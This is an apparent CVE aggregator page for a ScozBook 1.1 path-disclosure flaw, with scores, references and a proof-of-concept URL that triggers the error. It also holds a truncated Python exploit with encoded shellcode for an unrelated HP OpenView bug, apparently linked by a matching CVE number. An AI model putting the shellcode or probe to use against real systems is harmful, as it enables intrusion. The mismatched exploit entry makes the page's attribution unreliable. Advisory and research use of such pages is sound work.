CVE-2003-1555
published 2003-12-31CVE-2003-1555: ScozNet ScozBook 1.1 BETA allows remote attackers to obtain sensitive information via an invalid PG parameter in view.php, which reveals the installation path…
PriorityP48medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.11%
86.1th percentile
ScozNet ScozBook 1.1 BETA allows remote attackers to obtain sensitive information via an invalid PG parameter in view.php, which reveals the installation path in an error message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scoznet | scozbook | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
exploitdb·2010-07-02·CVSS 10.0
CVE-2010-1555 [CRITICAL] HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
HP OpenView Network Node Manager (OV NNM) - 'getnnmdata.exe' CGI Invalid Hostname Remote Code Execution
---
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1555
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
eh =(
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a"
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48"
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43"
"\x4a\x4a\x49\x42\x46\x4d\x51\x49\x5a\x4b\x4f\x44\x4f\x50"
"\x42\x46\x32\x42\x4a\x43\x32\x50\x58\x48\x4d\x46\x4e\x47"
"\x4c\x43\x35\x50
Exploit-DB
ScozBook 1.1 - Full Path Disclosure
exploitdb·2003-03-29
CVE-2003-1555 ScozBook 1.1 - Full Path Disclosure
ScozBook 1.1 - Full Path Disclosure
---
source: https://www.securityfocus.com/bid/7236/info
A path disclosure vulnerability has been reported for ScozBook. The issue occurs when a request is made to the view.php script page.
Access to sensitive filesystem information may aid an attacker in launching further attacks against a target system.
http://hostname/scozbook/view.php?PG=test
No writeups or analysis indexed.
http://secunia.com/advisories/8476http://securityreason.com/securityalert/3781http://www.securityfocus.com/archive/1/316747/30/25280/threadedhttp://www.securityfocus.com/bid/7236http://www.securitytracker.com/id?1006413https://exchange.xforce.ibmcloud.com/vulnerabilities/11659http://secunia.com/advisories/8476http://securityreason.com/securityalert/3781http://www.securityfocus.com/archive/1/316747/30/25280/threadedhttp://www.securityfocus.com/bid/7236http://www.securitytracker.com/id?1006413https://exchange.xforce.ibmcloud.com/vulnerabilities/11659
2003-12-31
Published